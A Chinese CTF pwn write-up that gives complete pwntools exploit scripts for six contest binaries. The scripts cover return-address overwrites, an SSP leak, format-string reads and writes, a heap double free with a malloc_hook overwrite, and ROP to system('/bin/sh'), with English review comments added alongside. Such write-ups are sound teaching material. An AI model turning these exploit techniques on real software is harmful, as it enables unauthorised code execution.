周六的时候回学校,周日打了一天,难度相对来说较为简单。

送你一朵小红花

部分覆盖返回地址跳到后门就行

# -*- coding: utf-8 -*
from pwn import *
# Echo every byte sent and received; handy while developing, noisy otherwise.
context.log_level = 'debug'
context.arch = 'amd64'
# Parsed target binary. Not referenced again in this listing.
elf = ELF('xhh')
# Tube (process or remote) that pwn() installs; 0 just means "not connected yet".
p = 0
def pwn(ip,port,debug):
    """Connect to the target and send the single-shot payload.

    Args:
        ip, port: remote endpoint, used when debug != 1.
        debug: 1 runs ./xhh locally via process(); anything else uses remote().

    Rebinds the module-level tube `p`, then hands the session to interactive().
    """
    global p
    if(debug == 1):
        p = process('./xhh')

    else:
        p = remote(ip,port)
    #gdb.attach(p)
    # 16 bytes of filler followed by two raw bytes. Per the write-up this is a
    # partial overwrite of the saved return address that lands in a backdoor
    # function; the two fixed bytes presuppose the code is always loaded at the
    # same address.
    # NOTE(review): a position-independent build (PIE) would make those two
    # bytes unpredictable and defeat the partial overwrite -- confirm for the target.
    p.send("a"*16+ "\xe1\x14")
    p.interactive()
if __name__ == '__main__':
    # Hard-coded contest endpoint; debug=0 selects the remote() branch.
    pwn('node2.hackingfor.fun',36231,0)

easystack

头一回碰到这个知识点:SSP(Stack Smashing Protector) leak。
简单来说就是覆盖__stack_chk_fail(canary校验失败时调用的函数)的参数来实现任意地址leak。

# -*- coding: utf-8 -*
from pwn import *
# ctypes is imported but nothing in this listing uses it.
from ctypes import *

# Echo every byte sent and received.
context.log_level = 'debug'
context.arch = 'amd64'
# Parsed target binary; not referenced again in this listing.
elf = ELF('easystack')
# Tube installed by pwn(); 0 means "not connected yet".
p = 0
def pwn(ip,port,debug):
    """Trigger the SSP leak the write-up describes.

    Args:
        ip, port: remote endpoint, used when debug != 1.
        debug: 1 runs ./easystack locally; anything else uses remote().

    Rebinds the module-level tube `p` and ends in interactive().
    """
    global p
    if(debug == 1):
        p = process('./easystack')

    else:
        p = remote(ip,port)
    #gdb.attach(p,"b *0x400A4D")
    # 800 bytes made of the same little-endian qword. Per the write-up the
    # overflow reaches the value __stack_chk_fail uses as the program name, so
    # the "stack smashing detected" message prints whatever is stored at 0x6CDE20.
    # NOTE(review): newer glibc releases omit the program name from that
    # message, which would close this leak -- confirm against the target's libc.
    p.sendline(p64(0x6CDE20)*100)
    p.interactive()
if __name__ == '__main__':
    # Hard-coded contest endpoint; debug=0 selects the remote() branch.
    pwn('node2.hackingfor.fun',39828,0)

scmt

利用格式化字符串泄露随机值

# -*- coding: utf-8 -*
from pwn import *
# ctypes is imported but nothing in this listing uses it.
from ctypes import *

# Echo every byte sent and received.
context.log_level = 'debug'
context.arch = 'amd64'
# Parsed target binary; not referenced again in this listing.
elf = ELF('scmt')
# Tube installed by pwn(); 0 means "not connected yet".
p = 0
def pwn(ip,port,debug):
    """Read the program's random value back through its own output and echo it.

    Args:
        ip, port: remote endpoint, used when debug != 1.
        debug: 1 runs ./scmt locally; anything else uses remote().

    Rebinds the module-level tube `p` and ends in interactive().
    """
    global p
    if(debug == 1):
        p = process('./scmt')

    else:
        p = remote(ip,port)
    #gdb.attach(p,"b *0x400B32")
    # The name is printed back through a format string (see the write-up);
    # '%8$p' makes it print the 8th positional argument as a pointer.
    p.sendlineafter("your name:\n",'%8$p')
    # Skip to the "0x" prefix and parse exactly six hex digits -- a value with
    # more or fewer digits would be mis-parsed here.
    p.recvuntil("0x")
    num = int(p.recv(6),16)
    # Answer the check with the value just read.
    p.sendlineafter("lucky number:\n",str(num))
    # NOTE(review): the root cause is the name being passed as printf's format
    # argument; printf("%s", name) would remove the leak.
    p.interactive()
if __name__ == '__main__':
    # Hard-coded contest endpoint; debug=0 selects the remote() branch.
    pwn('node2.hackingfor.fun',38253,0)

sooooeasy

UAF,没有leak函数,通过更改IO_stdout来leak libc,然后打malloc_hook。

# -*- coding: utf-8 -*
from pwn import *
# Echo every byte sent and received.
context.log_level = 'debug'
context.arch = 'amd64'
# Parsed target binary; not referenced again in this listing.
elf = ELF('sooooeasy')
# Tube installed by pwn(); the nested helpers inside pwn() read it as a global.
p = 0
def pwn(ip,port,debug):
    """Drive the sooooeasy heap challenge end to end.

    Args:
        ip, port: remote endpoint, used when debug != 1.
        debug: 1 runs ./sooooeasy locally; anything else uses remote().

    Rebinds the module-level tube `p`; the nested helpers read it as a global.
    Every libc offset below is a difference of addresses copied from one
    debugging session (the 0x7f73... values), so the script is pinned to that
    exact libc build.
    """
    global p
    if(debug == 1):
        p = process('./sooooeasy')

    else:
        p = remote(ip,port)
    def add(size,name,message):
        # Menu option 1: a name of `size` bytes, then a message.
        # `name` is sent raw (no newline appended), `message` with a newline.
        p.sendlineafter("Your choice : ",'1')
        p.sendlineafter("size of the your name: \n",str(size))
        p.sendafter("Your name:\n",name)
        p.sendlineafter("Your message:\n",message)
    def free(index):
        # Menu option 2: release entry `index`. Judging by the repeated free(3)
        # below, the program does not invalidate the slot afterwards.
        p.sendlineafter("Your choice : ",'2')
        p.sendlineafter("mumber's index:\n",str(index))
    def add2(size,name,message):
        # Same as add(), but prompts are matched without the trailing "\n".
        # Presumably required once stdout's state has been altered at step 9 -- confirm.
        p.sendlineafter("Your choice : ",'1')
        p.sendlineafter("size of the your name: ",str(size))
        p.sendafter("Your name:",name)
        p.sendlineafter("Your message:",message)
    def free2(index):
        # Same as free(), prompts matched without the trailing "\n".
        p.sendlineafter("Your choice : ",'2')
        p.sendlineafter("mumber's index:",str(index))
    # Entries 0-3: two 0x90-byte and two 0x60-byte names.
    add(0x90,'star','ss')#0
    add(0x90,'star','ss')#1
    add(0x60,'star','ss') #2
    add(0x60,'star','ss') #3
    # Free entry 1, then entry 4 writes two bytes into the reclaimed memory.
    free(1)
    add(0x68,'\xdd\x45','ss')#4
    # Entry 3 is freed twice around free(2): the UAF/double free the write-up relies on.
    # NOTE(review): clearing the slot on free (plus glibc's newer tcache
    # double-free check) would stop this sequence.
    free(3)
    free(2)
    free(3)
    # Entries 5-8: four more 0x68 allocations, each writing a single '\x30' byte.
    add(0x68,'\x30','ss')#5
    add(0x68,'\x30','ss')#6
    add(0x68,'\x30','ss')#7
    add(0x68,'\x30','ss')#8
    #--------leak libc --- # 9
    # Entry 9, written inline: the name carries 0xfbad1800 followed by three
    # zero qwords and a NUL -- the _IO_stdout modification the write-up uses to
    # get libc printed out.
    p.sendlineafter("Your choice : ",'1')
    p.sendlineafter("size of the your name: \n",str(104))
    p.sendafter("Your name:\n",'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
    # Skip 0x40 bytes of output, then take a 6-byte pointer padded to 8 bytes.
    p.recv(0x40)
    # Subtracted term is (leaked address - libc base) from the debugging session.
    libc_addr = u64(p.recv(6).ljust(8,"\x00"))-(0x7f73fba74600-0x7f73fb6af000)
    print "libc= ",hex(libc_addr)
    # Derived libc addresses; free_hook and system_addr are computed but never used below.
    free_hook = libc_addr + (0x7f73fba757a8 - 0x7f73fb6af000)
    malloc_hook = libc_addr + (0x7f73fba73b10 - 0x7f73fb6af000)
    system_addr = libc_addr + (0x7f73fb6f43a0 - 0x7f73fb6af000)
    realloc_addr = libc_addr + 0x84710
    # Candidate one-gadget offsets for this libc build; only [0] and [3] are used.
    one_ge = [0x45226,0x4527a,0xf0364,0xf1207]
    # Finish entry 9's message prompt; from here on prompts lack the trailing "\n".
    p.sendlineafter("Your message:",'ss')
    # Second double free of entry 3, then entries a-d: a's name is a pointer
    # just below malloc_hook, b/c repeat a one-gadget address, and d places a
    # different one-gadget followed by realloc_addr+4.
    free2(3)
    free2(2)
    free2(3)
    add2(0x68,p64(malloc_hook - 0x23),'ss')#a
    add2(0x68,'b'*0x13 + p64(libc_addr+one_ge[0]),'ss') #b
    add2(0x68,'b'*0x13 + p64(libc_addr+one_ge[0]),'ss') #c
    add2(0x68,'b'*0xb +p64(libc_addr+one_ge[3]) + p64(realloc_addr+4),'ss') #d
    #add2(0x68,'b'*0x13 + p64(libc_addr+one_ge[2]),'ss') #c
    #---shell e
    #gdb.attach(p)
    # Wait for Enter before the last step (useful for attaching a debugger by hand).
    pause()
    # NOTE: the label says "libc=" but this prints realloc_addr.
    print "libc= ",hex(realloc_addr)
    # Step e: one more allocation request, which the write-up expects to go
    # through the malloc_hook path prepared above.
    p.sendlineafter("Your choice : ",'1')

    p.interactive()
if __name__ == '__main__':
    # Hard-coded contest endpoint; debug=0 selects the remote() branch.
    pwn('node2.hackingfor.fun',38870,0)

easypwn

7字节格式化字符串,覆盖rbp最低字节为'\x00',一定概率将rbp指向可输入空间,然后利用之前两次输入在栈上布置好ROP。

# -*- coding: utf-8 -*
from pwn import *
# Echo every byte sent and received.
context.log_level = 'debug'
context.arch = 'amd64'
# Parsed target binary; not referenced again in this listing (gadgets are hard-coded).
elf = ELF('easypwn')
# Tube installed by pwn(); 0 means "not connected yet".
p = 0
def pwn(ip,port,debug):
    """Drive the easypwn challenge: three prompts plus one final line.

    Args:
        ip, port: remote endpoint, used when debug != 1.
        debug: 1 runs ./easypwn locally; anything else uses remote().

    Per the write-up the 7-byte format string zeroes the low byte of the saved
    rbp, which only lands with some probability, so re-running is expected.
    Gadget addresses are fixed 0x400... values (the binary is assumed to load
    at a constant base) and the libc path is an absolute path on the author's
    machine.
    """
    global p
    if(debug == 1):
        p = process('./easypwn')

    else:
        p = remote(ip,port)
    #gdb.attach(p,"b *0x400b7f")
    #gdb.attach(p,"b *0x400940")
    # Gadgets inside the target binary.
    pop_rdi_ret = 0x400be3
    pop_rsi_r15_ret = 0x400be1
    leave_ret = 0x400a1f
    ret = 0x4006ae
    pop_rbp_ret = 0x4007c8
    # Input 1 (teamname): rdi=0, rsi=0x602380, r15=0, call 0x400730, then
    # rbp=0x602378 and leave. Presumably 0x400730 reads the next stage into
    # 0x602380 and `leave` pivots the stack there -- confirm against the binary.
    payload = p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_r15_ret)+p64(0x602080+0x300)+p64(0)+p64(0x400730)
    payload += p64(pop_rbp_ret)+p64(0x602080+0x300-8)+p64(leave_ret)
    p.sendafter("teamname: ",payload)
    # Input 2 (name): nothing precedes %hhn, so it stores 0 into the low byte
    # of the 22nd positional argument -- the saved rbp, per the write-up.
    # NOTE(review): the name reaches printf as its format argument;
    # printf("%s", name) would remove this write primitive.
    payload = "%22$hhn"
    p.sendafter("input your name\n",payload)
    # Input 3 (introduction): three `ret`s as a sled, then rdi=0x602030,
    # call 0x4006C0 and continue at 0x400BD6. The value printed back is treated
    # as printf's address below, so 0x602030 is presumably printf@GOT -- confirm.
    payload = p64(ret)*3+p64(pop_rdi_ret)+p64(0x602030)+p64(0x4006C0)+p64(0x400BD6)
    p.sendafter("introduction\n",payload)
    # Skip 4 bytes, take a 6-byte pointer padded to 8, drop one trailing byte.
    p.recv(4)
    printf_addr = u64(p.recv(6).ljust(8,"\x00"))
    p.recv(1)
    # Machine-specific absolute path; fails anywhere else.
    libc = ELF("/home/starssgo/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc.so.6")
    libcbase_addr = printf_addr - libc.symbols["printf"]
    print "libcbase_addr = ",hex(libcbase_addr)
    system_addr = libcbase_addr + libc.symbols["system"]
    # Python 2 iterator protocol; under Python 3 this would be next(...).
    binsh_addr = libcbase_addr + libc.search("/bin/sh\x00").next()
    # Final line: rdi="/bin/sh", then system.
    p.sendline(p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr))
    p.interactive()
if __name__ == '__main__':
    # Hard-coded contest endpoint; debug=0 selects the remote() branch.
    pwn('node2.hackingfor.fun',31982,0)

superpower

读取/proc/self/syscall来泄露stack地址,然后利用格式化字符串修改返回地址控制程序流程。
代码比较乱。

# -*- coding: utf-8 -*
from pwn import *
# Echo every byte sent and received.
context.log_level = 'debug'
# NOTE(review): pwn() below packs everything with p32 and works with 32-bit
# addresses (0x0804..., 0xf7..., 0xff...), so 'amd64' looks like a template
# leftover; it appears harmless here because no arch-dependent helper
# (p64/u64/asm) is used in this listing.
context.arch = 'amd64'
# Parsed target binary; not referenced again in this listing.
elf = ELF('superpower')
# Tube installed by pwn(); 0 means "not connected yet".
p = 0
def pwn(ip,port,debug):
    """Drive the superpower challenge (a 32-bit target, see the p32 calls).

    Args:
        ip, port: remote endpoint, used when debug != 1.
        debug: 1 runs ./superpower locally; anything else uses remote().

    Two rounds of the same dialogue: the program is asked to read
    /proc/self/syscall, from which a stack pointer (and in round one a libc
    pointer) is parsed; then the name prompt is answered with a format string
    carrying %hn writes whose target pointers are appended to the payload.
    Round one only re-leaks libc and prints the computed values; round two
    does the writes the write-up describes as patching the return address.
    All offsets and positional-argument indices come from a debugging session.
    """
    global p
    if(debug == 1):
        p = process('./superpower')

    else:
        p = remote(ip,port)
    #gdb.attach(p,'b *0x80487B3')#0x80487dc
    # The trailing comment records an argument index (1063) and a return site
    # (0x804864B) from that session; neither is used by the code.
    # NOTE(review): two weaknesses combine here -- an unrestricted file path
    # (so /proc/self/syscall is readable) and the name reaching printf as its
    # format argument; a path allowlist or printf("%s", name) breaks the chain.
    p.sendlineafter("filename:","/proc/self/syscall")#1063 = ret 0x804864B 27
    # The third 0xff-prefixed value in the file is taken as a stack address,
    # the first 0xf7-prefixed one as a libc address; each is assumed to be
    # exactly eight hex digits (prefix + 6).
    p.recvuntil("0xff")
    p.recvuntil("0xff")
    p.recvuntil("0xff")
    stack_addr = int("ff" + p.recv(6),16)
    p.recvuntil("0xf7")
    libc_addr = int("f7" + p.recv(6),16)
    print "stack_addr = ",hex(stack_addr)
    print "libc_addr = " ,hex(libc_addr)
    # Dead store: libcbase_addr is recomputed from the %p output below before
    # it is ever read.
    libcbase_addr = libc_addr - (0xf7f70fd9-0xf7d98000)
    # Fixed distance from the leaked stack value to the slot being patched.
    return_addr = stack_addr + 0x11c4 # 42
    print "return_addr = ",hex(return_addr)
    #pause()
    # Round one: %1067$p re-leaks a libc pointer, then two %hn writes through
    # positional arguments 53 and 54. The 80-byte and 24-byte padding keep the
    # two p32 pointers at the end in those argument slots (presumably; the
    # indices are from the debugging session).
    payload = ("%1067$p%2042c%53$hn%32327c%54$hn").ljust(80,"\x00")
    payload += "/proc/self/syscall".ljust(24,"\x00")
    payload += p32(return_addr+2)+p32(return_addr)

    p.sendlineafter("what's you name?",payload)
    # Parse the %p output (eight hex digits) and rebase with a fixed offset.
    p.recvuntil("0x")
    libcbase_addr = int(p.recv(8),16)-(0xf7dd9647-0xf7dc1000)
    # libc.so is expected in the working directory.
    libc = ELF("libc.so")
    # Misnamed: this resolves execve, not system.
    system_addr = libcbase_addr+libc.symbols["execve"]
    # Python 2 iterator protocol; under Python 3 this would be next(...).
    binsh_addr = libcbase_addr+libc.search("/bin/sh\x00").next()
    # Split both addresses into 16-bit halves for the %hn writes.
    system_0_2 = system_addr&0xffff
    system_2_4 = (system_addr>>16)&0xffff
    binsh_0_2 = binsh_addr&0xffff
    binsh_2_4 = (binsh_addr>>16)&0xffff
    print "system_addr = ",hex(system_addr)
    print "binsh_addr = ",hex(binsh_addr)
    print "system_0_2 = ",hex(system_0_2)
    print "system_2_4 = ",hex(system_2_4)
    print "binsh_0_2 = ",hex(binsh_0_2)
    print "binsh_2_4 = ",hex(binsh_2_4)
    # Wait for Enter (useful for attaching a debugger by hand).
    pause()
    #gdb.attach(p,"b *0x80487dc")
    # Round two: re-read the stack address. The slot offset differs from round
    # one by 0xc; the trailing "#53" is again an argument index from the session.
    p.sendlineafter("filename:","/proc/self/syscall")
    p.recvuntil("0xff")
    p.recvuntil("0xff")
    p.recvuntil("0xff")
    stack_addr = int("ff" + p.recv(6),16)#53
    return_addr = stack_addr + 0x11c4-0xc
    # Six pointers are appended, landing in positional arguments 53..58 in
    # order: ret+8, ret, ret+2, ret+10, ret+12, ret+16. %57$n/%58$n store 0
    # (nothing printed yet) at ret+12 and ret+16; the %c widths are cumulative,
    # so the four %hn writes place binsh_0_2, system_0_2, system_2_4 and
    # binsh_2_4 at ret+8, ret, ret+2 and ret+10 respectively.
    # NOTE(review): each width is a difference from the previous total, so this
    # only works when the four halves sort ascending; a negative difference is
    # emitted as "%-Nc" (a flag, not a width) and the writes go wrong for that
    # libc layout.
    payload = ("%57$n%58$n"+"%"+str(binsh_0_2)+"c%53$hn"+"%"+str(system_0_2-binsh_0_2)+"c%54$hn"+"%"+str(system_2_4-system_0_2)+"c%55$hn"+"%"+str(binsh_2_4-system_2_4)+"c%56$hn").ljust(80,"\x00")
    payload += "/proc/self/syscall".ljust(24,"\x00")
    payload += p32(return_addr+8)+p32(return_addr)
    payload += p32(return_addr+2)+p32(return_addr+10)
    payload += p32(return_addr+12)+p32(return_addr+16)
    #payload = ("%2052c%53$hn%32327c%54$hn").ljust(80,"\x00")
    #payload += "/proc/self/syscall".ljust(24,"\x00")
    #payload += p32(return_addr+2)+p32(return_addr)
    p.sendlineafter("what's you name?",payload)
    p.interactive()
if __name__ == '__main__':
    # Hard-coded contest endpoint; debug=0 selects the remote() branch.
    pwn('node2.hackingfor.fun',32091,0)

总结

好久没打比赛了,做得太慢了。阿西吧。